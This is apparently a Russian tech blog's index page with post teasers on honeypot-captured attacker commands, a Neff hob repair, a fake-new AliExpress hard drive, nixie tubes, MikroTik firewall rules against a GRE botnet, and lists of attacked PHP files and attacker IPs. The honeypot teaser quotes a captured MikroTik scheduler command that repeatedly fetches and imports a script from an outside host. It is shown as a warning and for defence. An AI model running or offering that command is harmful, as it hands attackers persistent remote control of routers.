Перехваченные комманды хацкеров в FAKE SSH Honeypot cowrie

ХАЦКЕРЫ

Это перехваченные команды хацкеров через HONEYPOT COWRIE

ВВДИТЬ И ИСПОЛНЯТЬ ИХ НЕЛЬЗЯ! Ну если только очень хочется.)
перехват хакерских комманд через эмулятор терминала SSH
Перехват хакерских команд через эмулятор терминала SSH cowrie honeypot.

Микротиковский замес
/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://gamedate.xyz/poll/b94cc680-52b5-4c5a-92f0-37f0a1307729 mode=http dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write,1


и далее
Читать дальше

Neff - перестал работать сенсор на варочной панели T66TS61N0

РЕМОНТ и разборка
В ремонт попала Индукционная варочная панель NEFF T66TS61N0.
ремонт сенсора модели Встраиваемая Neff T66TS6RN0 Home Connect
Особенности модели
Встраиваемая
Цвет: черный
Ширина встраивания: 60 см
Количество зон нагрева: 4
Функция PanBoost
Управление TwistPad® Fire с таймером
Функция увеличения мощности PotBoost
Функция PowerMove
FlexZone
Зона FlexInduction
17 ступеней мощности
Мощность подключения: 7,4 кВт
Размеры прибора (ВxШxГ): 63,3 мм х 606 мм х 546 мм
Производитель: Испания

Модель снята с производства

Последователь: Neff T66TS6RN0 Home Connect

— — — и что с ней?

Особенность неисправности это перестал работать сенсор включения питания.


При сильном и долгом нажатии на сенсорную кнопку варочная панель T66TS61N0 включалась и работала.
Проблема прогрессировала с момента окончания гарантии NEFF.
Странно!

Читать дальше

Псевдоновый жесткий диск с алиэкспрес (TOSHIBA ОТЗЫВ)

На али существует магазин FIGHTING NATION Computer Store торгующий всякой электроникой для ПК, клавиатуры мышки и прочая ерунда.
Среди ассортимента есть интересная позиция.
Жесткий Диск TOSHIBA 2 ТБ, для бизнеса,SATA III 7200 об/мин 128 МБ Кэш 3,5 24/7 для DVR NVR видеонаблюдения
Вобщем энтерпрайз, значит можно использовать и в серваке.
Вот так выглядит. Цена около 4500р +- курс и распродажи.

Новые жесткие диски с алиэкспрес, не новые БУ

Читать дальше

Газоразрядные индикаторные лампы nixie и проблема изоляции проводников

Разное в электронике
Есть уникальный человек Dalibor Farný который создаёт газоразрядные индикаторы.
Nixie Tube & Clock Manufacturer.
Его канал в ютубе
www.youtube.com/channel/UC0IY1BQiMehWMvezqWLyk4g
Тут он запарился сиянием проводников идущих к индикатору внутри газоразрядной лампы в PROJECT H(x).
И правильно он сделал что начал искать ответ. Ибо сияние это не есть хорошо. Свечение в газоразрядных индикаторах должно быть там где оно должно быть.

газоразрядные лампы горит проводник
Читать дальше

Новые атаки GRE на VPN Микротик (pptp l2tp)

ХАЦКЕРЫ
Ботнет 92.63.194.0/24 GRE
Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24
Что он делает?
Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.
впн микротик атаки GRE
Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157
Что делать?
Сперва добавлять нижеприведённые правила и шиться последней прошивкой.
/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

МУДАКофский die(pi()*42);

ХАЦКЕРЫ
А вот список файлов в которые пытаюся впихнуть гадкий код с помощью POST запросов

417.509.php
accept.client.php
accept.json.php
accepted.sess.php
accepted.tools.php
assets
bad.except.php
body.work.php
code.sessions.php
conflicts.link.php
content.img.php
cookie.media.php
data.using.php
database.class.php
database.http.php
exception.config.php
exceptions.throw.php
exceptions.work.php
fail.lib.php
Читать дальше

МУДАКофский die(pi()*42);

ХАЦКЕРЫ

А вот ip адреса прокси серверов которые используются для атак на движки сайтов

Порты конечно же не указываю так как я не распространитель инфы об актуальных прокси листах, а просто собрал атаки с этих адресов
Список прокси
1.10.207.236
1.2.188.5
1.20.227.241
101.108.96.117
101.109.102.58
101.50.1.2
Читать дальше